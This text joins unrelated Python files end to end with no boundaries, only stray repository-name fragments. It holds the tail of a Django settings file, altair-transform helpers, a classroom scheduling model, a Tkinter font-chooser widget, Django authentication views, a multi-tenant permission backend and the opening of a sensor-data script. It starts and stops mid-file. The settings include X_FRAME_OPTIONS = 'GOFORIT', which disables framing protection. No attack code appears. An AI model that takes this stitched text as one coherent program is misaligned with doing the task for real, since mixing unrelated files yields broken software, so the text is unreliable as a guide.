['email-address', 'headline', 'industry'] # Arrange to add the fields to UserSocialAuth.extra_data SOCIAL_AUTH_LINKEDIN_OAUTH2_EXTRA_DATA = [('id', 'id'), ('firstName', 'first_name'), ('lastName', 'last_name'), ('emailAddress', 'email_address'), ('headline', 'headline'), ('industry', 'industry')] # LTI Parameters X_FRAME_OPTIONS = "GOFORIT" # SSL proxy fix SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') BROKER_URL = 'amqp://' CELERY_RESULT_BACKEND = 'amqp://' CELERY_TIMEZONE = 'UTC' CELERYBEAT_SCHEDULE = { 'check_anonymous': { 'task': 'mysite.celery.check_anonymous', 'schedule': timedelta(days=1), } } # Cache settings CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache', 'LOCATION': '127.0.0.1:11211', } } # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error when DEBUG=False. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' }, 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler' }, }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, 'lti_debug': { 'handlers': ['console'], 'level': 'INFO', }, 'celery_warn': { 'handlers': ['console'], 'level': 'INFO', }, } } jacobcolbert/altair-transform from typing import Any import pandas as pd import altair as alt from .visitor import visit from ..utils import to_dataframe # These submodules register appropriate visitors. from . import (aggregate, bin, calculate, filter, flatten, fold, # noqa: F401 impute, joinaggregate, lookup, sample, timeunit, window) __all__ = ['apply', 'extract_data', 'process_chart'] def apply(df: pd.DataFrame, transform: Any, inplace: bool = False) -> pd.DataFrame: """Apply transform or transforms to dataframe. Parameters ---------- df : pd.DataFrame transform : list|dict A transform specification or list of transform specifications. Each specification must be valid according to Altair's transform schema. 
inplace : bool If True, then dataframe may be modified in-place. Default: False. Returns ------- df_transformed : pd.DataFrame The transformed dataframe. """ if not inplace: df = df.copy() if transform is alt.Undefined: return df return visit(transform, df) def extract_data(chart: alt.Chart) -> pd.DataFrame: """Extract transformed data from a chart. This only works with data and transform defined at the top level of the chart. Parameters ---------- chart : alt.Chart The chart instance from which the data and transform will be extracted Returns ------- df_transformed : pd.DataFrame The extracted and transformed dataframe. """ return apply(to_dataframe(chart.data, chart), chart.transform) def transform_chart(chart: alt.Chart) -> alt.Chart: """Return a chart with the transformed data Parameters ---------- chart : alt.Chart The chart instance from which the data and transform will be extracted. Returns ------- chart_out : alt.Chart A copy of the input chart with the transformed data. """ chart = chart.properties(data=extract_data(chart)) chart.transform = alt.Undefined return chart from __future__ import annotations import uuid from abc import abstractmethod from copy import deepcopy from dataclasses import dataclass from datetime import datetime, timedelta from typing import List from uuid import UUID import arrow import pytz from domain.classroom.attendee import Attendee from domain.classroom.classroom_type import ClassroomSubject from domain.classroom.date_time_comparator import DateTimeComparator, DateComparator from domain.classroom.duration import Duration, MinuteTimeUnit, HourTimeUnit, TimeUnit from domain.datetimes import Weekdays from domain.exceptions import DomainException from domain.repository import AggregateRoot @dataclass class Schedule: start: datetime stop: datetime class Classroom(AggregateRoot): def __init__(self, name: str, position: int, schedule: Schedule, subject: ClassroomSubject, duration: Duration): super().__init__() self._name = name self._position = position self._schedule = schedule self._duration = duration self._attendees: [Attendee] = [] self._subject = subject @property def name(self) -> str: return self._name @property def position(self) -> int: return self._position @property def schedule(self) -> Schedule: return self._schedule @property def duration(self) -> Duration: return self._duration @property def attendees(self) -> List[Attendee]: return self._attendees @property def subject(self) -> ClassroomSubject: return self._subject @staticmethod def create(name: str, start_date: datetime, position: int, subject: ClassroomSubject, stop_date: datetime = None, duration: Duration = Duration(HourTimeUnit(1))) -> Classroom: if not stop_date: stop_date = start_date + timedelta(hours=duration.time_unit.to_unit(HourTimeUnit).value) classroom = Classroom(name, position, Schedule(start=start_date, stop=stop_date), subject, duration) return classroom def all_attendees(self, attendees: [Attendee]): if self._position < len(attendees): raise DomainException( f"Cannot add anymore attendees (position available: {self._position - len(self._attendees)} - attendee(s) you try to add: {len(attendees)})") self._attendees = attendees def next_session(self) -> ScheduledSession: if self.__has_session_today() or (self.__today_is_sunday() and self.__next_session_on_monday()): start: datetime = datetime.utcnow().replace(hour=self._schedule.start.hour, minute=self._schedule.start.minute, second=0, microsecond=0, tzinfo=self._schedule.start.tzinfo or pytz.utc) return 
ScheduledSession.create(self, start) def __has_session_today(self) -> bool: return DateTimeComparator(self._schedule.start, datetime.now()).same_date().compare() or (self._schedule.stop and DateTimeComparator(datetime.now(), self._schedule.start).same_day().compare()) def __today_is_sunday(self): return datetime.now().today().isoweekday() == Weekdays.SUNDAY def __next_session_on_monday(self): monday: datetime = datetime.now() + timedelta(days=1) return monday.isoweekday() == Weekdays.MONDAY def confirm_session_at(self, session_date: datetime) -> ConfirmedSession: return ConfirmedSession.create(self, session_date) def sessions_in_range(self, start_date: datetime, end_date: datetime) -> List[Session]: days: [datetime] = list(map(lambda day_range: day_range.date(), arrow.Arrow.range('day', start_date, end_date))) sessions: [Session] = [] classroom_start_date = self.schedule.start for day in days: if DateComparator(classroom_start_date.date(), day).same_day().before().compare() \ and DateComparator(day, end_date.date()).before().compare() \ and DateComparator(day, self.schedule.stop.date()).before().compare(): sessions.append(Session(self.id, self.name, self.position, self.subject, datetime(day.year, day.month, day.day, classroom_start_date.hour, classroom_start_date.minute, tzinfo=pytz.utc if classroom_start_date.tzinfo is None else classroom_start_date.tzinfo), self.duration.time_unit, self.attendees)) return sessions class Session: def __init__(self, classroom_id: UUID, name: str, position: int, subject: ClassroomSubject, start: datetime, classroom_duration: TimeUnit, attendees: [Attendee]) -> None: self.__name: str = name self.__position: int = position self.__subject: ClassroomSubject = subject self.__attendees: List[Attendee] = deepcopy(attendees) self.__start: datetime = start.astimezone(pytz.utc) if start.tzinfo is None else start self.__stop: datetime = self.__start + timedelta(minutes=classroom_duration.to_unit(MinuteTimeUnit).value) self.__classroom_id: UUID = classroom_id @property def classroom_id(self): return self.__classroom_id @property def attendees(self): return self.__attendees @property def name(self): return self.__name @property def position(self): return self.__position @property def start(self): return self.__start @property def stop(self): return self.__stop @property def subject(self) -> ClassroomSubject: return self.__subject @property @abstractmethod def id(self): return None class ScheduledSession(Session): @staticmethod def create(classroom: Classroom, start) -> ScheduledSession: return ScheduledSession(classroom.id, classroom.name, classroom.position, classroom.subject, start, classroom.duration.time_unit, classroom.attendees) @property def id(self): return None class ConfirmedSession(Session, AggregateRoot): def __init__(self, classroom_id: UUID, name: str, position: int, subject: ClassroomSubject, start: datetime, duration_time_unit: TimeUnit, attendees: [Attendee]) -> None: super().__init__(classroom_id, name, position, subject, start, duration_time_unit, attendees) self._id = uuid.uuid4() @staticmethod def create(classroom: Classroom, start: datetime) -> ConfirmedSession: if not DateTimeComparator(classroom.schedule.start, start).same_day().same_time().before().compare(): raise InvalidSessionStartDateException(classroom, start) return ConfirmedSession(classroom.id, classroom.name, classroom.position, classroom.subject, start, classroom.duration.time_unit, classroom.attendees) @property def id(self): return self._id def checkin(self, attendee: Attendee) -> 
Attendee: try: registered_attendee = next(filter(lambda current_attendee: current_attendee == attendee, self.attendees)) registered_attendee.checkin() return registered_attendee except StopIteration: raise DomainException(f"Attendee with id {str(attendee.id)} could not be checked in") def checkout(self, attendee: Attendee) -> Attendee: try: checked_out_attendee: Attendee = next(filter(lambda current_attendee: current_attendee == attendee, self.attendees)) checked_out_attendee.checkout() return checked_out_attendee except StopIteration: raise DomainException(f"Attendee with id {str(attendee.id)} could not be checked out") def cancel(self, attendee: Attendee) -> None: self.attendees.remove(attendee) class InvalidSessionStartDateException(DomainException): def __init__(self, classroom: Classroom, start_date: datetime, *args: object) -> None: if start_date < classroom.schedule.start: message = f"Classroom '{classroom.name}' starting at '{classroom.schedule.start.isoformat()}' cannot be set before" else: weekdays_difference = abs(classroom.schedule.start.date().weekday() - start_date.date().weekday()) closest_prior_date = datetime.combine((start_date.date() - timedelta(days=weekdays_difference)), classroom.schedule.start.time()).replace(tzinfo=pytz.utc) closest_following_date = datetime.combine((start_date.date() + timedelta(days=7 - weekdays_difference)), classroom.schedule.start.time()).replace(tzinfo=pytz.utc) message = f"Classroom '{classroom.name}' starting at '{classroom.schedule.start.isoformat()}' cannot be set at '{start_date.isoformat()}', closest possible dates are '{closest_prior_date.isoformat()}' or '{closest_following_date.isoformat()}'" super().__init__(message, *args) venv/Lib/site-packages/tkfontchooser.py # -*- coding: utf-8 -*- """ tkFontChooser - Font chooser for Tkinter Copyright 2016-2017 <> tkFontChooser is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. tkFontChooser is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" try: from tkinter import Toplevel, Listbox, StringVar, BooleanVar, TclError from tkinter.ttk import Checkbutton, Frame, Label, Button, Scrollbar, Style, Entry from tkinter.font import families, Font except ImportError: from Tkinter import Toplevel, Listbox, StringVar, BooleanVar from ttk import Checkbutton, Frame, Label, Button, Scrollbar, Style, Entry from tkFont import families, Font from locale import getdefaultlocale __version__ = "2.0.2" # --- translation EN = {"Cancel": "Cancel", "Bold": "Bold", "Italic": "Italic", "Underline": "Underline", "Overstrike": "Strikethrough"} FR = {"Cancel": "Annuler", "Bold": "Gras", "Italic": "Italique", "Underline": "Souligné", "Overstrike": "Barré"} IT = {"Cancel": "Annulla", "Bold": "Grassetto", "Italic": "Corsivo", "Underline": "Sottolineato", "Overstrike": "Barrato"} LANGUAGES = {"fr": FR, "en": EN, "it": IT} if getdefaultlocale()[0][:2] == "fr": TR = LANGUAGES["fr"] elif getdefaultlocale()[0][:2] == "it": TR = LANGUAGES["it"] else: TR = LANGUAGES["en"] # --- FontChooser class class FontChooser(Toplevel): """.Font chooser dialog.""" def __init__(self, master, font_dict={}, text="Abcd", title="Font Chooser", **kwargs): """ Create a new FontChooser instance. Arguments: master: master window font_dict: dictionnary, like the one returned by the .actual method of a Font object: {'family': 'DejaVu Sans', 'overstrike': False, 'size': 12, 'slant': 'italic' or 'roman', 'underline': False, 'weight': 'bold' or 'normal'} text: text to be displayed in the preview label title: window title **kwargs: additional keyword arguments to be passed to Toplevel.__init__ """ Toplevel.__init__(self, master, **kwargs) self.title(title) self.resizable(False, False) self.protocol("WM_DELETE_WINDOW", self.quit) self._validate_family = self.register(self.validate_font_family) self._validate_size = self.register(self.validate_font_size) # --- variable storing the chosen font self.res = "" style = Style(self) style.configure("prev.TLabel", background="white") bg = style.lookup("TLabel", "background") self.configure(bg=bg) # --- family list self.fonts = list(set(families())) self.fonts.append("TkDefaultFont") self.fonts.sort() for i in range(len(self.fonts)): self.fonts[i] = self.fonts[i].replace(" ", "\ ") max_length = int(2.5 * max([len(font) for font in self.fonts])) // 3 self.sizes = ["%i" % i for i in (list(range(6, 17)) + list(range(18, 32, 2)))] # --- font default font_dict["weight"] = font_dict.get("weight", "normal") font_dict["slant"] = font_dict.get("slant", "roman") font_dict["underline"] = font_dict.get("underline", False) font_dict["overstrike"] = font_dict.get("overstrike", False) font_dict["family"] = font_dict.get("family", self.fonts[0].replace('\ ', ' ')) font_dict["size"] = font_dict.get("size", 10) # --- creation of the widgets # ------ style parameters (bold, italic ...) 
options_frame = Frame(self, relief='groove', borderwidth=2) self.font_family = StringVar(self, " ".join(self.fonts)) self.font_size = StringVar(self, " ".join(self.sizes)) self.var_bold = BooleanVar(self, font_dict["weight"] == "bold") b_bold = Checkbutton(options_frame, text=TR["Bold"], command=self.toggle_bold, variable=self.var_bold) b_bold.grid(row=0, sticky="w", padx=4, pady=(4, 2)) self.var_italic = BooleanVar(self, font_dict["slant"] == "italic") b_italic = Checkbutton(options_frame, text=TR["Italic"], command=self.toggle_italic, variable=self.var_italic) b_italic.grid(row=1, sticky="w", padx=4, pady=2) self.var_underline = BooleanVar(self, font_dict["underline"]) b_underline = Checkbutton(options_frame, text=TR["Underline"], command=self.toggle_underline, variable=self.var_underline) b_underline.grid(row=2, sticky="w", padx=4, pady=2) self.var_overstrike = BooleanVar(self, font_dict["overstrike"]) b_overstrike = Checkbutton(options_frame, text=TR["Overstrike"], variable=self.var_overstrike, command=self.toggle_overstrike) b_overstrike.grid(row=3, sticky="w", padx=4, pady=(2, 4)) # ------ Size and family self.var_size = StringVar(self) self.entry_family = Entry(self, width=max_length, validate="key", validatecommand=(self._validate_family, "%d", "%S", "%i", "%s", "%V")) self.entry_size = Entry(self, width=4, validate="key", textvariable=self.var_size, validatecommand=(self._validate_size, "%d", "%P", "%V")) self.list_family = Listbox(self, selectmode="browse", listvariable=self.font_family, highlightthickness=0, exportselection=False, width=max_length) self.list_size = Listbox(self, selectmode="browse", listvariable=self.font_size, highlightthickness=0, exportselection=False, width=4) scroll_family = Scrollbar(self, orient='vertical', command=self.list_family.yview) scroll_size = Scrollbar(self, orient='vertical', command=self.list_size.yview) self.preview_font = Font(self, **font_dict) if len(text) > 30: text = text[:30] self.preview = Label(self, relief="groove", style="prev.TLabel", text=text, font=self.preview_font, anchor="center") # --- widget configuration self.list_family.configure(yscrollcommand=scroll_family.set) self.list_size.configure(yscrollcommand=scroll_size.set) self.entry_family.insert(0, font_dict["family"]) self.entry_family.selection_clear() self.entry_family.icursor("end") self.entry_size.insert(0, font_dict["size"]) try: i = self.fonts.index(self.entry_family.get().replace(" ", "\ ")) except ValueError: # unknown font i = 0 self.list_family.selection_clear(0, "end") self.list_family.selection_set(i) self.list_family.see(i) try: i = self.sizes.index(self.entry_size.get()) self.list_size.selection_clear(0, "end") self.list_size.selection_set(i) self.list_size.see(i) except ValueError: # size not in list pass self.entry_family.grid(row=0, column=0, sticky="ew", pady=(10, 1), padx=(10, 0)) self.entry_size.grid(row=0, column=2, sticky="ew", pady=(10, 1), padx=(10, 0)) self.list_family.grid(row=1, column=0, sticky="nsew", pady=(1, 10), padx=(10, 0)) self.list_size.grid(row=1, column=2, sticky="nsew", pady=(1, 10), padx=(10, 0)) scroll_family.grid(row=1, column=1, sticky='ns', pady=(1, 10)) scroll_size.grid(row=1, column=3, sticky='ns', pady=(1, 10)) options_frame.grid(row=0, column=4, rowspan=2, padx=10, pady=10, ipadx=10) self.preview.grid(row=2, column=0, columnspan=5, sticky="eswn", padx=10, pady=(0, 10), ipadx=4, ipady=4) button_frame = Frame(self) button_frame.grid(row=3, column=0, columnspan=5, pady=(0, 10), padx=10) Button(button_frame, text="Ok", 
command=self.ok).grid(row=0, column=0, padx=4, sticky='ew') Button(button_frame, text=TR["Cancel"], command=self.quit).grid(row=0, column=1, padx=4, sticky='ew') self.list_family.bind('<>', self.update_entry_family) self.list_size.bind('<>', self.update_entry_size, add=True) self.list_family.bind("", self.keypress) self.entry_family.bind("", self.change_font_family) self.entry_family.bind("", self.tab) self.entry_size.bind("", self.change_font_size) self.entry_family.bind("", self.down_family) self.entry_size.bind("", self.down_size) self.entry_family.bind("", self.up_family) self.entry_size.bind("", self.up_size) # bind Ctrl+A to select all instead of go to beginning self.bind_class("TEntry", "", self.select_all) self.wait_visibility(self) self.grab_set() self.entry_family.focus_set() self.lift() def select_all(self, event): """Select all entry content.""" event.widget.selection_range(0, "end") def keypress(self, event): """Select the first font whose name begin by the key pressed.""" key = event.char.lower() l = [i for i in self.fonts if i[0].lower() == key] if l: i = self.fonts.index(l[0]) self.list_family.selection_clear(0, "end") self.list_family.selection_set(i) self.list_family.see(i) self.update_entry_family() def up_family(self, event): """Navigate in the family listbox with up key.""" try: i = self.list_family.curselection()[0] self.list_family.selection_clear(0, "end") if i <= 0: i = len(self.fonts) self.list_family.see(i - 1) self.list_family.select_set(i - 1) except TclError: self.list_family.selection_clear(0, "end") i = len(self.fonts) self.list_family.see(i - 1) self.list_family.select_set(i - 1) self.list_family.event_generate('<>') def up_size(self, event): """Navigate in the size listbox with up key.""" try: s = self.var_size.get() if s in self.sizes: i = self.sizes.index(s) elif s: sizes = list(self.sizes) sizes.append(s) sizes.sort(key=lambda x: int(x)) i = sizes.index(s) else: i = 0 self.list_size.selection_clear(0, "end") if i <= 0: i = len(self.sizes) self.list_size.see(i - 1) self.list_size.select_set(i - 1) except TclError: i = len(self.sizes) self.list_size.see(i - 1) self.list_size.select_set(i - 1) self.list_size.event_generate('<>') def down_family(self, event): """Navigate in the family listbox with down key.""" try: i = self.list_family.curselection()[0] self.list_family.selection_clear(0, "end") if i >= len(self.fonts): i = -1 self.list_family.see(i + 1) self.list_family.select_set(i + 1) except TclError: self.list_family.selection_clear(0, "end") self.list_family.see(0) self.list_family.select_set(0) self.list_family.event_generate('<>') def down_size(self, event): """Navigate in the size listbox with down key.""" try: s = self.var_size.get() if s in self.sizes: i = self.sizes.index(s) elif s: sizes = list(self.sizes) sizes.append(s) sizes.sort(key=lambda x: int(x)) i = sizes.index(s) - 1 else: s = len(self.sizes) - 1 self.list_size.selection_clear(0, "end") if i < len(self.sizes) - 1: self.list_size.selection_set(i + 1) self.list_size.see(i + 1) else: self.list_size.see(0) self.list_size.select_set(0) except TclError: self.list_size.selection_set(0) self.list_size.event_generate('<>') def toggle_bold(self): """Update font preview weight.""" b = self.var_bold.get() self.preview_font.configure(weight=["normal", "bold"][b]) def toggle_italic(self): """Update font preview slant.""" b = self.var_italic.get() self.preview_font.configure(slant=["roman", "italic"][b]) def toggle_underline(self): """Update font preview underline.""" b = self.var_underline.get() 
self.preview_font.configure(underline=b) def toggle_overstrike(self): """Update font preview overstrike.""" b = self.var_overstrike.get() self.preview_font.configure(overstrike=b) def change_font_family(self, event=None): """Update font preview family.""" family = self.entry_family.get() if family.replace(" ", "\ ") in self.fonts: self.preview_font.configure(family=family) def change_font_size(self, event=None): """Update font preview size.""" size = int(self.var_size.get()) self.preview_font.configure(size=size) def validate_font_size(self, d, ch, V): """Validation of the size entry content.""" l = [i for i in self.sizes if i[:len(ch)] == ch] i = None if l: i = self.sizes.index(l[0]) elif ch.isdigit(): sizes = list(self.sizes) sizes.append(ch) sizes.sort(key=lambda x: int(x)) i = min(sizes.index(ch), len(self.sizes)) if i is not None: self.list_size.selection_clear(0, "end") self.list_size.selection_set(i) deb = self.list_size.nearest(0) fin = self.list_size.nearest(self.list_size.winfo_height()) if V != "forced": if i < deb or i > fin: self.list_size.see(i) return True if d == '1': return ch.isdigit() else: return True def tab(self, event): """Move at the end of selected text on tab press.""" self.entry_family = event.widget self.entry_family.selection_clear() self.entry_family.icursor("end") return "break" def validate_font_family(self, action, modif, pos, prev_txt, V): """Completion of the text in the entry with existing font names.""" if self.entry_family.selection_present(): sel = self.entry_family.selection_get() txt = prev_txt.replace(sel, '') else: txt = prev_txt if action == "0": txt = txt[:int(pos)] + txt[int(pos) + 1:] return True else: txt = txt[:int(pos)] + modif + txt[int(pos):] ch = txt.replace(" ", "\ ") l = [i for i in self.fonts if i[:len(ch)] == ch] if l: i = self.fonts.index(l[0]) self.list_family.selection_clear(0, "end") self.list_family.selection_set(i) deb = self.list_family.nearest(0) fin = self.list_family.nearest(self.list_family.winfo_height()) index = self.entry_family.index("insert") self.entry_family.delete(0, "end") self.entry_family.insert(0, l[0].replace("\ ", " ")) self.entry_family.selection_range(index + 1, "end") self.entry_family.icursor(index + 1) if V != "forced": if i < deb or i > fin: self.list_family.see(i) return True else: return False def update_entry_family(self, event=None): """Update family entry when an item is selected in the family listbox.""" # family = self.list_family.get("@%i,%i" % (event.x , event.y)) family = self.list_family.get(self.list_family.curselection()[0]) self.entry_family.delete(0, "end") self.entry_family.insert(0, family) self.entry_family.selection_clear() self.entry_family.icursor("end") self.change_font_family() def update_entry_size(self, event): """Update size entry when an item is selected in the size listbox.""" # size = self.list_size.get("@%i,%i" % (event.x , event.y)) size = self.list_size.get(self.list_size.curselection()[0]) self.var_size.set(size) self.change_font_size() def ok(self): """Validate choice.""" self.res = self.preview_font.actual() self.quit() def get_res(self): """Return chosen font.""" return self.res def quit(self): self.destroy() def askfont(master=None, text="Abcd", title="Font Chooser", **font_args): """ Open the font chooser and return the chosen font. 
Arguments: master: master window text: sample text to be displayed in the font chooser title: dialog title font_args: family, size, slant (=roman/italic), weight (=normal/bold), underline (bool), overstrike (bool) """ chooser = FontChooser(master, font_args, text, title) chooser.wait_window(chooser) return chooser.get_res() if __name__ == "__main__": """Example.""" try: from tkinter import Tk except ImportError: from Tkinter import Tk from sys import platform root = Tk() style = Style(root) if "win" == platform[:3]: style.theme_use('vista') elif "darwin" in platform: style.theme_use('clam') else: style.theme_use('clam') bg = style.lookup("TLabel", "background") root.configure(bg=bg) label = Label(root, text='Chosen font: ') label.pack(padx=10, pady=(10, 4)) def callback(): font = askfont(root, title="Choose a font") if font: # spaces in the family name need to be escaped font['family'] = font['family'].replace(' ', '\ ') font_str = "%(family)s %(size)i %(weight)s %(slant)s" % font if font['underline']: font_str += ' underline' if font['overstrike']: font_str += ' overstrike' label.configure(font=font_str, text='Chosen font: ' + font_str.replace('\ ', ' ')) Button(root, text='Font Chooser', command=callback).pack(padx=10, pady=(4, 10)) root.mainloop() 1-10 from django.shortcuts import get_object_or_404, render from django.http import HttpResponse from django.urls import reverse from django.views import generic from .forms import SignupForm, LoginForm, MyForgotPasswordForm, MySetPasswordForm from django.contrib.auth.models import User from django.http import JsonResponse import json from django.urls import reverse_lazy from django.contrib.auth import login from django.contrib.auth.views import LoginView,PasswordResetView, PasswordResetDoneView, PasswordResetConfirmView, PasswordResetCompleteView from django.contrib.sessions.models import Session from django.contrib import messages from django.shortcuts import resolve_url from django.conf import settings from django.contrib.auth.mixins import LoginRequiredMixin from django.utils.translation import gettext as _ # INDEX class HomePageView(LoginRequiredMixin,generic.TemplateView): template_name = 'users/index.html' context_object_name = 'latest_question_list' def get_context_data(self, **kwargs): self.request.session['foo'] = 'xbar' context = super(HomePageView, self).get_context_data(**kwargs) return context # SIGNUP class RegisterView(generic.CreateView): model = User success_url = reverse_lazy('users:index') form_class = SignupForm template_name = 'users/register.html' # LOGIN class MyLogin(LoginView): authentication_form = LoginForm template_name = 'users/login.html' redirect_authenticated_user = True def get_success_url(self): url = self.get_redirect_url() messages.success(self.request, 'Successfully logged in',extra_tags='alert-success') return url or resolve_url(settings.LOGIN_REDIRECT_URL) # Forgot Password Form class MyPasswordReset(PasswordResetView): form_class = MyForgotPasswordForm from_email = '' template_name = 'users/registration/password_reset_form.html' email_template_name = 'email/forgot_password.html' success_url = reverse_lazy('users:password_reset_done') subject_template_name = 'users/auth/password_reset_subject.txt' # Email Sent class MyPasswordResetDone(PasswordResetDoneView): template_name = 'users/registration/password_reset_done.html' # LINK Landing Page class MyPasswordResetConfirm(PasswordResetConfirmView): post_reset_login = True post_reset_login_backend = 'django.contrib.auth.backends.ModelBackend' form_class = 
MySetPasswordForm success_url = reverse_lazy('users:password_reset_complete') template_name = 'users/registration/password_reset_confirm.html' # Password Change Success class MyPasswordResetComplete(PasswordResetCompleteView): template_name = 'users/registration/password_reset_complete.html' title = _('Password reset complete') shared_schema_tenants/auth_backends.py10-100 import logging from django.contrib.auth.models import Permission from django.contrib.auth.backends import ModelBackend from django.contrib.auth import get_user_model from django.db.models import Q from shared_schema_tenants.models import TenantRelationship from shared_schema_tenants.helpers.tenants import get_current_tenant UserModel = get_user_model() logger = logging.getLogger(__name__) class TenantModelBackend(ModelBackend): """ Authenticates against settings.AUTH_USER_MODEL. """ def _get_user_global_permissions(self, user_obj): return user_obj.user_permissions.all() def _get_group_global_permissions(self, user_obj): user_groups_field = get_user_model()._meta.get_field('groups') user_groups_query = 'group__%s' % user_groups_field.related_query_name() return Permission.objects.filter(**{user_groups_query: user_obj}) def _get_user_tenant_permissions(self, relationship): return relationship.permissions.all() def _get_group_tenant_permissions(self, relationship): relationship_groups_field = TenantRelationship._meta.get_field('groups') relationship_groups_query = 'group__%s' % relationship_groups_field.related_query_name() return Permission.objects.filter(**{relationship_groups_query: relationship}) def _get_user_permissions(self, relationship): relationship_permissions_field = TenantRelationship._meta.get_field('permissions') relationship_permission_query = relationship_permissions_field.related_query_name() user_permissions_field = UserModel._meta.get_field('user_permissions') user_permission_query = user_permissions_field.related_query_name() user_groups_field = get_user_model()._meta.get_field('groups') user_groups_query = 'group__%s' % user_groups_field.related_query_name() return Permission.objects.filter( Q(**{relationship_permission_query: relationship}) | Q(**{user_permission_query: relationship.user}) | Q(**{user_groups_query: relationship.user})).distinct() def _get_group_permissions(self, relationship): relationship_groups_field = TenantRelationship._meta.get_field( 'groups') relationship_groups_query = 'group__%s' % relationship_groups_field.related_query_name() user_groups_field = get_user_model()._meta.get_field('groups') user_groups_query = 'group__%s' % user_groups_field.related_query_name() return Permission.objects.filter( Q(**{relationship_groups_query: relationship}) | Q(**{user_groups_query: relationship.user})) def _get_tenant_permissions(self, user_obj, obj, from_name): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() tenant = get_current_tenant() if not tenant: return set() perm_cache_name = '_tenant_%s_perm_cache' % from_name if (not hasattr(user_obj, perm_cache_name) or not getattr(user_obj, perm_cache_name).get(tenant.pk)): if user_obj.is_superuser: relationship_perms = Permission.objects.all() relationship_perms = relationship_perms.values_list( 'content_type__app_label', 'codename').order_by() else: try: relationship = TenantRelationship.objects.get( user=user_obj, tenant=tenant) except TenantRelationship.DoesNotExist: relationship_perms = set() else: relationship_perms = getattr(self, '_get_%s_tenant_permissions' % from_name)(relationship) 
relationship_perms = relationship_perms.values_list( 'content_type__app_label', 'codename').order_by() setattr(user_obj, perm_cache_name, { tenant.pk: { "%s.%s" % (ct, name) for ct, name in relationship_perms } }) return getattr(user_obj, perm_cache_name).get(tenant.pk) def _get_global_permissions(self, user_obj, obj, from_name): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() perm_cache_name = '_%s_perm_cache' % from_name if not hasattr(user_obj, perm_cache_name): if user_obj.is_superuser: perms = Permission.objects.all() else: perms = getattr(self, '_get_%s_global_permissions' % from_name)(user_obj) perms = perms.values_list('content_type__app_label', 'codename').order_by() setattr(user_obj, perm_cache_name, set("%s.%s" % (ct, name) for ct, name in perms)) return getattr(user_obj, perm_cache_name) def _get_permissions(self, user_obj, obj, from_name): return self._get_global_permissions(user_obj, obj, from_name).union( self._get_tenant_permissions(user_obj, obj, from_name)) def get_user_global_permissions(self, user_obj, obj=None): return self._get_global_permissions(user_obj, obj, 'user') def get_user_tenant_permissions(self, user_obj, obj=None): return self._get_tenant_permissions(user_obj, obj, 'user') def get_group_global_permissions(self, user_obj, obj=None): return self._get_global_permissions(user_obj, obj, 'group') def get_group_tenant_permissions(self, user_obj, obj=None): return self._get_tenant_permissions(user_obj, obj, 'group') def get_all_global_permissions(self, user_obj, obj=None): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() if not hasattr(user_obj, '_perm_cache'): user_obj._perm_cache = self.get_user_global_permissions(user_obj, obj) user_obj._perm_cache.update(self.get_group_global_permissions(user_obj, obj)) return user_obj._perm_cache def get_all_tenant_permissions(self, user_obj, obj=None): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() tenant = get_current_tenant() if not tenant: return set() if (not hasattr(user_obj, '_tenant_perm_cache') or not getattr(user_obj, '_tenant_perm_cache').get(tenant.pk)): user_obj._tenant_perm_cache = {tenant.pk: self.get_user_tenant_permissions(user_obj, obj)} user_obj._tenant_perm_cache[tenant.pk].update(self.get_group_tenant_permissions(user_obj, obj)) return user_obj._tenant_perm_cache[tenant.pk] def get_all_permissions(self, user_obj, obj=None): return self.get_all_global_permissions(user_obj, obj).union( self.get_all_tenant_permissions(user_obj, obj)) """ Extract, combine, and correct chamber sensor data. For pre-processing only, not intended for general-purpose use. Hyytiälä COS campaign, April-November 2016 (c) 2016-2017 <> Revision history ---------------- 26 May 2016, W.S. - The two PAR sensors are now called 'PAR_ch_1' and 'PAR_ch_2', because their association with the chambers changed throughout the campaign. 29 Aug 2016, W.S. - Continue to the next day's file in the loop when the current day's file is not found. This is to skip the day 28 Aug 2016 for missing data. 16 Jan 2017, W.S. - Running options are now controlled by an external config file. 
- Code review and small edits - Ad hoc filtering criteria added - Daily plot option added, which is controlled by the preprocessing config """ import argparse import glob import datetime import numpy as np import pandas as pd import matplotlib.pyplot as plt import preproc_config # preprocessing config file, in the same directory def IQR_bounds_func(x): """Filter thermocouple data by IQR bounds. Used only in this script.""" if np.sum(np.isfinite(x)) > 0: q1, q3 = np.nanpercentile(x, [25, 75]) IQR = q3 - q1 return(q1 - 2 * IQR, q3 + 5 * IQR) else: return(np.nan, np.nan) # define terminal argument parser parser = argparse.ArgumentParser( description='Extract, combine, and correct chamber sensor data.') parser.add_argument('-s', '--silent', dest='flag_silent_mode', action='store_true', help='silent mode: run without printing daily summary') args = parser.parse_args() # echo program starting print('Subsetting, gapfilling and downsampling the biomet sensor data...') dt_start = datetime.datetime.now() print(datetime.datetime.strftime(dt_start, '%Y-%m-%d %X')) print('numpy version = ' + np.__version__) print('pandas version = ' + pd.__version__) if preproc_config.run_options['plot_sensor_data']: print('Plotting option is enabled. Will generate daily plots.') # settings pd.options.display.float_format = '{:.2f}'.format # let pandas dataframe displays float with 2 decimal places plt.rcParams.update({'mathtext.default': 'regular'}) # sans-serif math plt.style.use('ggplot') sensor_dir = preproc_config.data_dir['sensor_data_raw'] output_dir = preproc_config.data_dir['sensor_data_reformatted'] # get file list of sensor data 